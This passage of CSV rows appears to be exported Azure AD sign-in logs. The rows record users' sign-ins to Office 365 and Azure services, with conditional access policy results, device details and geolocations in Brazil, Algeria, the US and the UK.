{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:24,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d09c2317-414d-4072-ab4f-d2f6f5040900,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,d09c2317-414d-4072-ab4f-d2f6f5040900,SigninLogs,Sucess,-20.54751015,-47.4056282
+1567,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:44.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,52ee917a-8ce5-45e7-8bce-ba44d82e76af,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:24,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d09c2317-414d-4072-ab4f-d2f6ce060900,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,d09c2317-414d-4072-ab4f-d2f6ce060900,SigninLogs,Sucess,-20.54751015,-47.4056282
+1568,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:30.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,697e0704-61e9-4ace-b2db-48d036a86976,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:58,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",875c831a-2c9c-4e0a-b7c7-b83027f30600,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,875c831a-2c9c-4e0a-b7c7-b83027f30600,SigninLogs,Sucess,28,3
+1569,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:38.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e726f7c3-9a09-40c4-a93a-eae964e4b2a1,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 10:00,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",1161e009-d3bf-4fe8-9b17-d1235e612000,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,1161e009-d3bf-4fe8-9b17-d1235e612000,SigninLogs,Sucess,51.4458313,-0.969720006
+1570,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:37.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5ca0a64f-d511-445e-b6be-202dc87b6748,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office Delve,94c63fef-13a3-47bc-8074-75af8c65887a,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 35, 'displayName': 'GBB demo', 'result': 'success', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:55,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",3006daeb-4fa9-44e4-baa4-8ca7f7490800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3006daeb-4fa9-44e4-baa4-8ca7f7490800,SigninLogs,Sucess,34.06555176,-118.2405396
+1571,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:01.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cfe57034-1217-4265-b88c-f70e1fa80133,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 09:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",cbcd7f19-25f4-4cfd-824c-94dc919b0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,cbcd7f19-25f4-4cfd-824c-94dc919b0700,SigninLogs,Sucess,36.6404686,-78.26995087
+1572,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:29.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,73af469f-302d-0000-54b3-35991f963600,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:56,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",178eb907-c36d-4662-9369-da02c3b20700,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,178eb907-c36d-4662-9369-da02c3b20700,SigninLogs,Sucess,28,3
+1573,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:38.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e726f7c3-9a09-40c4-a93a-eae964e4b2a1,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 10:00,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",1161e009-d3bf-4fe8-9b17-d1235e612000,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,1161e009-d3bf-4fe8-9b17-d1235e612000,SigninLogs,Sucess,51.4458313,-0.969720006
